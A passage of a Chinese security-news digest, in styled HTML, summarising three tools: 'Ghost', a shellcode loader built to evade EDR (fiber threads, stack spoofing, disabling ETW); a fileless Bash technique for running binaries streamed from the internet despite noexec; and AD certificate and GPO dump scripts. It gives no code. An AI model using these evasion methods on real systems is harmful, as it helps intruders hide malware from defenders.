	<p>🏷️: RFID, 硬件黑客, 克隆设备, 电子工程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0d
			 Ghost：利用Fiber线程绕过EDR检测的Shellcode加载器</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Ghost 是一个旨在绕过端点检测和响应（EDR）多种检测能力的 shellcode 加载器项目。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.3925925925925926" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=31835e34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp69XtwZd4odPJjO9Bq1y5OkYA4PfSxHlhWVicq9icoLqiaMNWiaPWkoiaBc3Q%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ghost：一款绕过EDR检测的Shellcode加载器</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ghost：绕过EDR检测的Shellcode加载器</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6mMAFTASjsjwBCxM70Fb2Rqah4nKUGTvx9a4JNKVhLcP5GK32kVm8LA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6mMAFTASjsjwBCxM70Fb2Rqah4nKUGTvx9a4JNKVhLcP5GK32kVm8LA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525442421515112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用纤程线程避免内核回调的检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过堆栈欺骗技术逃避堆栈展开检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">采用内存填充和随机放置技术减少内存扫描的效果。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">实施多种辅助绕过技术，如停用 ETW、自定义 API 哈希和利用资源隐藏。</section></li></ul>
	<br/>
	<p>🏷️: Shellcode, 内存, 内核, 检测, Fiber线程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0e
			 绕过noexec限制执行任意二进制文件</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本网页介绍了一种在Linux系统上绕过noexec限制，实现无文件执行的技术，通过使用Bash进行系统调用，将ELF可执行文件直接从互联网流式传输到Bash的地址空间，而不需要写入硬盘或依赖ptrace()或mmap()。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">无需执行权限，利用BASH或PHP执行任意后门</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">绕过 noexec 执行任意二进制文件</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6yD6QIkPxRTvQmeMsDibLPDMdZlQiaMh0LiacHBeMLQnvPibM5HFu5zxPEA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6yD6QIkPxRTvQmeMsDibLPDMdZlQiaMh0LiacHBeMLQnvPibM5HFu5zxPEA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858225248545111"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">文件执行技术可以在没有执行权限的环境中运行可执行文件，这对于那些没有写入权限或者在noexec环境中工作的攻击者来说是一个有用的手段。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">传统的文件执行方法可能会因为系统安全限制而失效，如noexec挂载标志或ptrace禁用，而本文提出的方法可以绕过这些限制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">使用Bash进行系统调用的方法具有创新性，它不需要依赖于传统的mmap(2)或ptrace(2)调用，而是直接将二进制文件流式传输到进程的地址空间。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Perl和PHP变体提供了更多的灵活性，它们可以在不同的环境和限制条件下使用，尤其是在容器环境中。</section></li></ul>
	<br/>
	<p>🏷️: noexec, shellcode, Bash, syscall, fileless execution</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0f
			 通过API0cradle添加证书和GPO转储脚本</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了一个新增的脚本，用于导出证书信息到文本文件，并且模仿了certipy工具的输出格式。此外，还更新了一个组策略转储脚本。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9258f5b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6OoseKyACJjGToFyh6HhO0TvMEscQqa6oBf4HGTWiaLWEVo6u836Mlsw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ADExplorer更新：新增GPO导出脚本，方便识别异常写入权限</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6kicfVd6ZPAib4aLM0R0FA7d2095h4X0Ec0Xia4fywCj9lp3QL7NSYJmBg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6kicfVd6ZPAib4aLM0R0FA7d2095h4X0Ec0Xia4fywCj9lp3QL7NSYJmBg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2858225248518851"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
